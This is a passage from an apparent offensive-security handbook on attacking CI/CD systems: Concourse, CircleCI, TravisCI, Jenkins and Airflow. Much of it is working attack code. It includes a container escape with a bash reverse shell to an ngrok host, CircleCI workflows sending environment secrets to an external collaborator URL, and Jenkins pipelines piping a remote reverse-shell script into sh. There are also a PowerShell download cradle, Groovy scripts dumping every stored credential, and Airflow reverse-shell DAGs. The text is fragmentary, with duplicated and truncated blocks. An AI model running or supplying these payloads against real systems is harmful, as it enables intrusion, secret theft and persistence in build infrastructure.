Org admins can also indicate if the repo admins can add and or remove
access for teams. They can also indicate the max number of repos.
It's indicated the repos of the org the members of the team will be
able to access: specific repos (repos where the team is added) or all.
It's also indicated if members can create new repos (creator will get
admin access to it)
The permissions the members of the repo will have:
Administrator access
Specific access:
Teams & Users
In a repo, the org admin and the repo admins (if allowed by the org) can
manage the roles given to collaborators (other users) and teams. There are
3 possible roles:
Administrator
Write
Read
Gitea Authentication
Web Access
Using username + password and potentially (and recommended) a 2FA.
SSH Keys
You can configure your account with one or several public keys allowing
the related private key to perform actions on your behalf.
http://localhost:3000/user/settings/keys
GPG Keys
You cannot impersonate the user with these keys but if you don't use it it
might be possible that you get discover for sending commits without a
signature.
Oauth Applications
Just like personal access tokens Oauth applications will have complete
access over your account and the places your account has access because,
as indicated in the docs, scopes aren't supported yet:
Deploy keys
Deploy keys might have read-only or write access to the repo, so they might
be interesting to compromise specific repos.
Branch Protections
Branch protections are designed to not give complete control of a
repository to the users. The goal is to put several protection methods
before being able to write code inside some branch.
As you can see, even if you managed to obtain some credentials of a user,
repos might be protected avoiding you to pushing code to master for
example to compromise the CI/CD pipeline.
concourse-architecture.md
Concourse Lab
Learn how you can run a concourse environment locally to do your own
tests in:
concourse-lab-creation.md
Enumerate & Attack Concourse
Learn how you can enumerate the concourse environment and abuse it in:
concourse-enumeration-and-attacks.md
The TSA by default listens on port 2222 , and is usually colocated with
the ATC and sitting behind a load balancer.
The TSA implements CLI over the SSH connection, supporting these
commands.
Workers
In order to execute tasks concourse must have some workers. These
workers register themselves via the TSA and run the services Garden and
Baggageclaim.
Garden: This is the Container Manage API, usually run in port 7777
via HTTP.
Baggageclaim: This is the Volume Management API, usually run in
port 7788 via HTTP.
With Docker-Compose
This docker-compose file simplifies the installation to do some tests with
concourse:
wget https://raw.githubusercontent.com/starkandwayne/concourse-
tutorial/master/docker-compose.yml
docker-compose up -d
You can download the command line fly for your OS from the web in
127.0.0.1:8080
After generating the concourse env, you could generate a secret and give a
access to the SA running in concourse web to access K8s secrets:
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: read-secrets
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: read-secrets-concourse
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
subjects:
- kind: ServiceAccount
name: concourse-release-web
namespace: default
---
apiVersion: v1
kind: Secret
metadata:
name: super
namespace: concourse-release-main
type: Opaque
data:
secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
Create Pipeline
A pipeline is made of a list of Jobs which contains an ordered list of Steps.
Steps
Several different type of steps can be used:
Each step in a job plan runs in its own container. You can run anything you
want inside the container (i.e. run my tests, run this bash script, build this
image, etc.). So if you have a job with five steps Concourse will create five
containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to
be run in.
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should
run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker
hub by default
run:
path: sh
args:
- -cx
- |
sleep 1000
echo "$SUPER_SECRET"
params:
SUPER_SECRET: ((super.secret))
fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml
# pipelines are paused when first created
fly -t tutorial unpause-pipeline -p pipe-name
# trigger the job and watch it run to completion
fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
Triggers
You don't need to trigger the jobs manually every-time you need to run
them, you can also program them to be run every-time:
Static Vars
Static vars can be specified in tasks steps:
- task: unit-1.13
file: booklit/ci/unit.yml
vars: {tag: 1.13}
Credential Management
There are different ways a Credential Manager can be specified in a
pipeline, read how in https://concourse-ci.org/creds.html. Moreover,
Concourse supports different credential managers:
Note that if you have some kind of write access to Concourse you can
create jobs to exfiltrate those secrets as Concourse needs to be able to
access them.
Concourse Enumeration
In order to enumerate a concourse environment you first need to gather
valid credentials or to find an authenticated token probably in a .flyrc
config file.
client-cert=./path --client-key=./path]
Note that the API token is saved in $HOME/.flyrc by default, you looting
a machines you could find there the credentials.
Pipelines
List pipelines:
fly -t <target> pipelines -a
[^}]+'; done
Get all the pipelines secret names used (if you can create/modify a
job or hijack a container you could exfiltrate them):
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" |
awk '{print $2}'); do
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\
(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
List containers:
fly -t <target> containers
Pipeline Creation/Modification
If you have enough privileges (member role or more) you will be able to
create/modify new pipelines. Check this example:
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should
run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker
hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
With the modification/creation of a new pipeline you will be able to:
Steal the secrets (via echoing them out or getting inside the container
and running env )
Escape to the node (by giving you enough privileges - privileged:
true )
Enumerate/Abuse cloud metadata endpoint (from the pod and from
the node)
Delete created pipeline
In the following PoC we are going to use the release_agent to escape with
some small modifications:
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special
device cgroup does not exist"
# It's because your setup doesn't have the memory cgroup
controller, try change memory to rdma to fix it
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
&& mkdir /tmp/cgrp/x
# CHANGE ME
# The host path will look like the following, but you need to
change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-
work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-
4c45-73e2-a9388dcb2028/rootfs"
#====================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================
As you might have noticed this is just a regular release_agent escape just
modifying the path of the cmd in the node
#====================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================
cat /concourse-auth/local-users
test:test
You cloud use that credentials to login against the web server and create a
privileged container and escape to the node.
In the environment you can also find information to access the postgresql
instance that concourse uses (address, username, password and database
among other info):
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
CONCOURSE_POSTGRES_USER=concourse
CONCOURSE_POSTGRES_DATABASE=concourse
CONCOURSE_POSTGRES_PASSWORD=concourse
[...]
Note that playing with concourse I noted that when a new container is
spawned to run something, the container processes are accessible from the
worker container, so it's like a container creating a new container inside of
it.
# OR instead of doing all of that, you could just get into the
ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
However, the web server is checking every few seconds the containers that
are running, and if an unexpected one is discovered, it will be deleted. As
the communication is occurring in HTTP, you could tamper the
communication to avoid the deletion of unexpected containers:
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
.
However, you need to be a a repo admin in order to convert the repo into
a CircleCI project.
Env Variables & Secrets
According to the docs there are different ways to load values in
environment variables inside a workflow.
Clear text
You can declare them in clear text inside a command:
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
You can declare them in clear text inside the run environment:
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
You can declare them in clear text inside the build-job environment:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
You can declare them in clear text inside the environment of a container:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
Project Secrets
These are secrets that are only going to be accessible by the project (by
any branch).\ You can see them declared in
https://app.circleci.com/settings/project/github///environment-variables
The "Import Variables" functionality allows to import variables from
other projects to this one.
Context Secrets
These are secrets that are org wide. By default any repo is going to be able
to access any secret stored here:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
If you don't have access to the web console but you have access to the
repo and you know that CircleCI is used, you can just create a workflow
that is triggered every minute and that exfils the secrets to an external
address:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl
https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?
a=`env | base64 -w0`"
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
If you don't have access to the web console but you have access to the
repo and you know that CircleCI is used, you can just modify a workflow
that is triggered every minute and that exfils the secrets to an external
address:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl
https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?
a=`env | base64 -w0`"
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
Persistence
It's possible to create user tokens in CircleCI to access the API
endpoints with the users access.
https://app.circleci.com/settings/user/tokens
It's possible to create projects tokens to access the project with the
permissions given to the token.
https://app.circleci.com/settings/project/github///api
It's possible to add SSH keys to the projects.
https://app.circleci.com/settings/project/github///ssh
It's possible to create a cron job in hidden branch in an unexpected
project that is leaking all the context env vars everyday.
Or even create in a branch / modify a known job that will leak all
context and projects secrets everyday.
If you are a github owner you can allow unverified orbs and
configure one in a job as backdoor
You can find a command injection vulnerability in some task and
inject commands via a secret modifying its value
basic-travisci-information.md
Attacks
Triggers
To launch an attack you first need to know how to trigger a build. By
default TravisCI will trigger a build on pushes and pull requests:
Cron Jobs
If you have access to the web application you can set crons to run the
build, this could be useful for persistence or to trigger a build:
It looks like It's not possible to set crons inside the .travis.yml according
to this.
Third Party PR
TravisCI by default disables sharing env variables with PRs coming from
third parties, but someone might enable it and then you could create PRs to
the repo and exfiltrate the secrets:
Dumping Secrets
As explained in the basic information page, there are 2 types of secrets.
Environment Variables secrets (which are listed in the web page) and
custom encrypted secrets, which are stored inside the .travis.yml file
as base64 (note that both as stored encrypted will end as env variables in
the final machines).
TODO:
Example build with reverse shell running on Windows/Mac/Linux
Example build leaking the env base64 encoded in the logs
TravisCI Enterprise
If an attacker ends in an environment which uses TravisCI enterprise
(more info about what this is in the basic information), he will be able to
trigger builds in the the Worker. This means that an attacker will be able
to move laterally to that server from which he could be able to:
user:email (read-only)
read:org (read-only)
repo : Grants read and write access to code, commit statuses,
collaborators, and deployment statuses for public and private
repositories and organizations.
Encrypted Secrets
Environment Variables
In TravisCI, as in other CI platforms, it's possible to save at repo level
secrets that will be saved encrypted and be decrypted and push in the
environment variable of the machine executing the build.
It's possible to indicate the branches to which the secrets are going to be
available (by default all) and also if TravisCI should hide its value if it
appears in the logs (by default it will).
Then, you can use this setup to encrypt secrets and add them to your
.travis.yaml . The secrets will be decrypted when the build is run and
accessible in the environment variables.
Note that the secrets encrypted this way won't appear listed in the
environmental variables of the settings.
Note that when encrypting a file 2 Env Variables will be configured inside
the repo such as:
TravisCI Enterprise
Travis CI Enterprise is an on-prem version of Travis CI, which you can
deploy in your infrastructure. Think of the ‘server’ version of Travis CI.
Using Travis CI allows you to enable an easy-to-use Continuous
Integration/Continuous Deployment (CI/CD) system in an environment,
which you can configure and secure as you want to.
1. TCI services (or TCI Core Services), responsible for integration with
version control systems, authorizing builds, scheduling build jobs, etc.
2. TCI Worker and build environment images (also called OS images).
basic-jenkins-information.md
Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication like
(/people or /asynchPeople, this lists the current users) you can use:
You may be able to get the Jenkins version from the path /oops or /error
Known Vulnerabilities
https://github.com/gquere/pwn_jenkins
Login
In the basic information you can check all the ways to login inside
Jenkins:
basic-jenkins-information.md
Register
You will be able to find Jenkins instances that allow you to create an
account and login inside of it. As simple as that.
SSO Login
Also if SSO functionality/plugins were present then you should attempt to
log-in to the application using a test account (i.e., a test Github/Bitbucket
account). Trick from here.
Bruteforce
Jekins does not implement any password policy or username brute-force
mitigation. Then, you should always try to brute-force users because
probably weak passwords are being used (even usernames as passwords
or reverse usernames as passwords).
IP Whitelisting Bypass
Many orgs combines SaaS-based source control management (SCM)
systems (like GitHub or GitLab) with an internal, self-hosted CI solution
(e.g. Jenkins, TeamCity) allowing these CI systems to receive webhook
events from the SaaS source control vendors, for the simple purpose of
triggering pipeline jobs.
Therefore, the orgs whitelists the IP ranges of the SCM allowing them to
reach the internal CI system with webhooks. However, note how anyone
can create an account in Github or Gitlab and make it trigger a webhook
that could send a request to that internal CI system.
scm-ip-whitelisting-bypass.md
Internal Jenkins Abuses
In these scenarios we are going to suppose you have a valid account to
access Jenkins.
basic-jenkins-information.md
Listing users
If you have accessed Jenkins you can list other registered users in
http://127.0.0.1:8080/asynchPeople/
jenkins-rce-creating-modifying-project.md
jenkins-rce-with-groovy-script.md
jenkins-rce-creating-modifying-pipeline.md
Pipeline Exploitation
To exploit pipelines you still need to have access to Jenkins.
Build Pipelines
Pipelines can also be used as build mechanism in projects, in that case it
can be configured a file inside the repository that will contains the pipeline
syntax. By default /Jenkinsfile is used:
It's also possible to store pipeline configuration files in other places (in
other repositories for example) with the goal of separating the repository
access and the pipeline access.
If an attacker have write access over that file he will be able to modify it
and potentially trigger the pipeline without even having access to Jenkins.\
It's possible that the attacker will need to bypass some branch protections
(depending on the platform and the user privileges they could be bypassed
or not).
If you are an external user you shouldn't expect to create a PR to the main
branch of the repo of other user/organization and trigger the pipeline...
but if it's bad configured you could fully compromise companies just by
exploiting this.
Pipeline RCE
In the previous RCE section it was already indicated a technique to get
RCE modifying a pipeline.
pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
Dumping secrets
For information about how are secrets usually treated by Jenkins check out
the basic information:
basic-jenkins-information.md
Here you have the way to load some common secret types:
withCredentials([usernamePassword(credentialsId: 'flag2',
usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
}
withCredentials([usernameColonPassword(credentialsId:
'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
}
At the end of this page you can find all the credential types:
https://www.jenkins.io/doc/pipeline/steps/credentials-binding/
The best way to dump all the secrets at once is by compromising the
Jenkins machine (running a reverse shell in the built-in node for example)
and then leaking the master keys and the encrypted secrets and
decrypting them offline.\ More on how to do this in the Nodes & Agents
section and in the Post Exploitation section.
Triggers
From the docs: The triggers directive defines the automated ways in
which the Pipeline should be re-triggered. For Pipelines which are
integrated with a source such as GitHub or BitBucket, triggers may not
be necessary as webhooks-based integration will likely already be present.
The triggers currently available are cron , pollSCM and upstream .
Cron example:
You can enumerate the configured nodes in /computer/ , you will usually
find the ** Built-In Node ** (which is the node running Jenkins) and
potentially more:
To indicate you want to run the pipeline in the built-in Jenkins node you
can specify inside the pipeline the following config:
pipeline {
agent {label 'built-in'}
Complete example
Pipeline in an specific agent, with a cron trigger, with pipeline and stage
env variables, loading 2 variables in a step and sending a reverse shell:
pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId:
'amazon', usernameVariable: 'USERNAME', passwordVariable:
'PASSWORD'),
string(credentialsId: 'slack-
url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-
shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}
post {
always {
cleanWs()
}
}
}
Post Exploitation
Metasploit
msf> post/multi/gather/jenkins_gather
Jenkins Secrets
You can list the secrets accessing /credentials/ if you have enough
permissions. Note that this will only list the secrets inside the
credentials.xml file, but build configuration files might also have more
credentials.
If you can see the configuration of each project, you can also see in there
the names of the credentials (secrets) being use to access the repository
and other credentials of the project.
From Groovy
jenkins-dumping-secrets-from-groovy.md
From disk
These files are needed to decrypt Jenkins secrets:
secrets/master.key
secrets/hudson.util.Secret
credentials.xml
jobs/.../build.xml
jobs/.../config.xml
# Secret example
credentials.xml: <secret>
{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOz
TSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
println(hudson.util.Secret.decrypt("{...}"))
config.xml
4. Now go to the Jenkins portal again and Jenkins will not ask any
credentials this time. You navigate to "Manage Jenkins" to set the
administrator password again.
5. Enable the security again by changing settings to
<useSecurity>true</useSecurity> and restart the Jenkins again.
References
https://github.com/gquere/pwn_jenkins
https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---
toying-with-powersploit/
https://www.pentestgeek.com/penetration-testing/hacking-jenkins-
servers-with-no-password
https://www.lazysystemadmin.com/2018/12/quick-howto-reset-
jenkins-admin-password.html
https://medium.com/cider-sec/exploiting-jenkins-build-authorization-
22bf72926072
Cookie
If an authorized cookie gets stolen, it ca be used to access the session of
the user. The cookie is usually called JSESSIONID.* . (A user can terminate
all his sessions, but he would need to find out first that a cookie was stolen).
SSO/Plugins
Jenkins can be configured using plugins to be accessible via third party
SSO.
Tokens
Users can generate tokens to give access to applications to impersonate
them via CLI or REST API.
SSH Keys
This component provides a built-in SSH server for Jenkins. It’s an
alternative interface for the Jenkins CLI, and commands can be invoked this
way using any SSH client. (From the docs)
Authorization
In /configureSecurity it's possible to configure the authorization
method of Jenkins. There are several options:
Plugins can provide additional security realms which may be useful for
incorporating Jenkins into existing identity systems, such as:
Active Directory
GitHub Authentication
Atlassian Crowd 2
Jenkins Nodes, Agents & Executors
Nodes are the machines on which build agents run. Jenkins monitors each
attached node for disk space, free temp space, free swap, clock time/sync
and response time. A node is taken offline if any of these values go outside
the configured threshold.
Credentials Access
Credentials can be scoped to global providers ( /credentials/ ) that can
be accessed by any project configured, or can be scoped to specific
projects ( /job/<project-name>/configure ) and therefore only accessible
from the specific project.
According to the docs: Credentials that are in scope are made available to
the pipeline without limitation. To prevent accidental exposure in the
build log, credentials are masked from regular output, so an invocation of
env (Linux) or set (Windows), or programs printing their environment
or parameters would not reveal them in the build log to users who would
not otherwise have access to the credentials.
1. Go to path_jenkins/script
2. Inside the text box introduce the script
If you need to use quotes and single quotes inside the text. You can use
"""PAYLOAD""" (triple double quotes) to execute the payload.
scriptblock="iex (New-Object
Net.WebClient).DownloadString('http://192.168.252.1:8000/payloa
d')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Script
You can automate this process with this script.
2. Inside Build section set Execute shell and paste a powershell Empire
launcher or a meterpreter powershell (can be obtained using unicorn).
Start the payload with PowerShell.exe instead using powershell.
3. Click Build now
i. If Build now button doesn't appear, you can still go to configure
--> Build Triggers --> Build periodically and set a cron of *
* * * *
ii. Instead of using cron, you can use the config "Trigger builds
remotely" where you just need to set a the api token name to
trigger the job. Then go to your user profile and generate an API
token (call this API token as you called the api token to trigger
the job). Finally, trigger the job with: curl <username>:
<api_token>@<jenkins_url>/job/<job_name>/build?token=
<api_token_name>
Modifying a Project
Go to the projects and check if you can configure any of them (look for the
"Configure button"):
If you cannot see any configuration button then you cannot configure it
probably (but check all projects as you might be able to configure some of
them and not others).
Or try to access to the path /job/<proj-name>/configure or /me/my-
views/view/all/job/Project0/configure ).
Execution
If you are allowed to configure the project you can make it execute
commands when a build is successful:
Click on Save and build the project and your command will be executed.\
If you are not executing a reverse shell but a simple command you can see
the output of the command inside the output of the build.
stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-
shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}
Finally click on Save, and Build Now and the pipeline will be executed:
Modifying a Pipeline
If you can access the configuration file of some pipeline configured you
could just modify it appending your reverse shell and then execute it or
wait until it gets executed.
You can dump all the secrets from the Groovy Script console in
/script running this code
// From https://www.dennisotugo.com/how-to-view-all-jenkins-
secrets-credentials/
import jenkins.model.*
import com.cloudbees.plugins.credentials.*
import com.cloudbees.plugins.credentials.impl.*
import com.cloudbees.plugins.credentials.domains.*
import
com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserP
rivateKey
import org.jenkinsci.plugins.plaincredentials.StringCredentials
import
org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl
credentialsStore =
Jenkins.instance.getExtensionList('com.cloudbees.plugins.creden
tials.SystemCredentialsProvider')[0]?.getStore()
domain = new Domain(domainName, null, Collections.
<DomainSpecification>emptyList())
credentialsStore?.getCredentials(domain).each{
if(it instanceof UsernamePasswordCredentialsImpl)
showRow("user/password", it.id, it.username,
it.password?.getPlainText(), it.description)
else if(it instanceof BasicSSHUserPrivateKey)
showRow("ssh priv key", it.id, it.passphrase?.getPlainText(),
it.privateKeySource?.getPrivateKey()?.getPlainText(),
it.description)
else if(it instanceof StringCredentials)
showRow("secret text", it.id, it.secret?.getPlainText(), '',
it.description)
else if(it instanceof FileCredentialsImpl)
showRow("secret file", it.id, it.content?.text, '',
it.description)
else
showRow("something else", it.id, '', '', '')
}
return
or this one:
import java.nio.charset.StandardCharsets;
def creds =
com.cloudbees.plugins.credentials.CredentialsProvider.lookupCre
dentials(
com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(),
StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
}
Therefore, the orgs whitelists the IP ranges of the SCM allowing them to
reach the internal CI system with webhooks. However, note how anyone
can create an account in Github or Gitlab and make it trigger a webhook
that could send a request to that internal CI system.
Moreover, note that while the IP range of the SCM vendor webhook service
was opened in the organization’s firewall to allow webhook requests to
trigger pipelines – this does not mean that webhook requests cannot be
directed towards other CI endpoints, besides the ones that regularly listen
to webhook events. We can try and access these endpoints to view valuable
data like users, pipelines, console output of pipeline jobs, or if we’re
lucky enough to fall on an instance that grants admin privileges to
unauthenticated users (yes, it happens), we can access the configurations
and credentials sections.
Scenario
Imagine a Jenkins service which only allows GitHub and GitLab IPs to
reach him externally.
j_username=admin&j_password=mypass123&from=%2F&Submit=Sign+in
POST /j_acegi_security_check?
j_username=admin&j_password=mypass123&from=%2F&Submit=Sign+in
HTTP/1.1
Host: jenkins.example-domain.com
[...]
http://jenkins.example-domain.com/j_acegi_security_check?
j_username=admin&j_password=therealpassword&from=%2F&Submit=Sig
n+in
We fire the webhook, and see the results. All SCM vendors display the
HTTP request and response sent through the webhook in their UI.\ If the
login attempt fails, we’re redirected to the login error page.
But if the login is successful, we’re redirected to the main Jenkins page,
and a session cookie is set.
http://jenkins.example-domain.com/j_acegi_security_check?
j_username=admin&j_password=secretpass123&from=/job/prod_pipeli
ne/1/consoleText&Submit=Sign+in
http://jenkins.example-
domain.com/job/prod_pipeline/1/consoleText
Job console output is sent back and presented in the attacker’s GitLab
webhook event log.
Minikube
One easy way to run apache airflow is to run it with minikube:
airflow-configuration.md
Airflow RBAC
Before start attacking Airflow you should understand how permissions
work:
airflow-rbac.md
Attacks
Web Console Enumeration
If you have access to the web console you might be able to access some or
all of the following information:
Privilege Escalation
If the expose_config configuration is set to True, from the role User and
upwards can read the config in the web. In this config, the secret_key
appears, which means any user with this valid they can create its own
signed cookie to impersonate any other user account.
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433
0>&1',
)
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
DAG Creation
If you manage to compromise a machine inside the DAG cluster, you can
create new DAGs scripts in the dags/ folder and they will be replicated
in the rest of the machines inside the DAG cluster.
All you need to know to start looking for command injections in DAGs
is that parameters are accessed with the code
dag_run.conf.get("param_name") .
Moreover, the same vulnerability might occur with variables (note that
with enough privileges you could control the value of the variables in the
GUI). Variables are accessed with:
If they are used for example inside a a bash command, you could perform a
command injection.
There are two ways to access this file: By compromising some airflow
machine, or accessing the web console.
Note that the values inside the config file might not be the ones used, as
you can overwrite them setting env variables such as
AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true' .
If you have access to the config file in the web server, you can check the
real running configuration in the same page the config is displayed.\ If
you have access to some machine inside the airflow env, check the
environment.
[api]
access_control_allow_headers : This indicates the allowed headers
for CORS
access_control_allow_methods : This indicates the allowed methods
for CORS
access_control_allow_origins : This indicates the allowed origins
for CORS
auth_backend : According to the docs a few options can be in place
to configure who can access to the API:
airflow.api.auth.backend.deny_all : By default nobody can
access the API
airflow.api.auth.backend.default : Everyone can access it
without authentication
airflow.api.auth.backend.kerberos_auth : To configure
kerberos authentication
airflow.api.auth.backend.basic_auth : For basic
authentication
airflow.composer.api.backend.composer_auth : Uses
composers authentication (GCP) (from here).
composer_auth_user_registration_role : This indicates
the role the composer user will get inside airflow (Op by
default).
You can also create you own authentication method with
python.
google_key_path : Path to the GCP service account key
[atlas]
password : Atlas password
username : Atlas username
[celery]
flower_basic_auth : Credentials
(user1:password1,user2:password2)
result_backend : Postgres url which may contain credentials.
ssl_cacert : Path to the cacert
ssl_cert : Path to the cert
ssl_key : Path to the key
[core]
dag_discovery_safe_mode : Enabled by default. When discovering
DAGs, ignore any files that don’t contain the strings DAG and
airflow .
fernet_key : Key to store encrypted variables (symmetric)
hide_sensitive_var_conn_fields : Enabled by default, hide sensitive
info of connections.
security : What security module to use (for example kerberos)
[dask]
tls_ca : Path to ca
tls_cert : Part to the cert
tls_key : Part to the tls key
[kerberos]
ccache : Path to ccache file
forwardable : Enabled by default
[logging]
google_key_path : Path to GCP JSON creds.
[secrets]
backend : Full class name of secrets backend to enable
backend_kwargs : The backend_kwargs param is loaded into a
dictionary and passed to init of secrets backend class.
[smtp]
smtp_password : SMTP password
smtp_user : SMTP user
[webserver]
cookie_samesite : By default it's Lax, so it's already the weakest
possible value
cookie_secure : Set secure flag on the the session cookie
expose_config : By default is False, if true, the config can be read
from the web console
expose_stacktrace : By default it's True, it will show python
tracebacks (potentially useful for an attacker)
secret_key : This is the key used by flask to sign the cookies (if
you have this you can impersonate any user in Airflow)
web_server_ssl_cert : Path to the SSL cert
web_server_ssl_key : Path to the SSL Key
x_frame_enabled : Default is True, so by default clickjacking isn't
possible
Web Authentication
By default web authentication is specified in the file
webserver_config.py and is configured as
AUTH_TYPE = AUTH_DB
AUTH_TYPE = AUTH_OAUTH
AUTH_ROLE_PUBLIC = 'Admin'
Note that admin users can create more roles with more granular
permissions.
Also note that the only default role with permission to list users and roles
is Admin, not even Op is going to be able to do that.
Default Permissions
These are the default permissions per default role:
Admin
[can delete on Connections, can read on Connections, can edit on
Connections, can create on Connections, can read on DAGs, can edit on
DAGs, can delete on DAGs, can read on DAG Runs, can read on Task
Instances, can edit on Task Instances, can delete on DAG Runs, can create
on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on
ImportError, can delete on Pools, can read on Pools, can edit on Pools, can
create on Pools, can read on Providers, can delete on Variables, can read on
Variables, can edit on Variables, can create on Variables, can read on
XComs, can read on DAG Code, can read on Configurations, can read on
Plugins, can read on Roles, can read on Permissions, can delete on Roles,
can edit on Roles, can create on Roles, can read on Users, can create on
Users, can edit on Users, can delete on Users, can read on DAG
Dependencies, can read on Jobs, can read on My Password, can edit on My
Password, can read on My Profile, can edit on My Profile, can read on SLA
Misses, can read on Task Logs, can read on Website, menu access on
Browse, menu access on DAG Dependencies, menu access on DAG Runs,
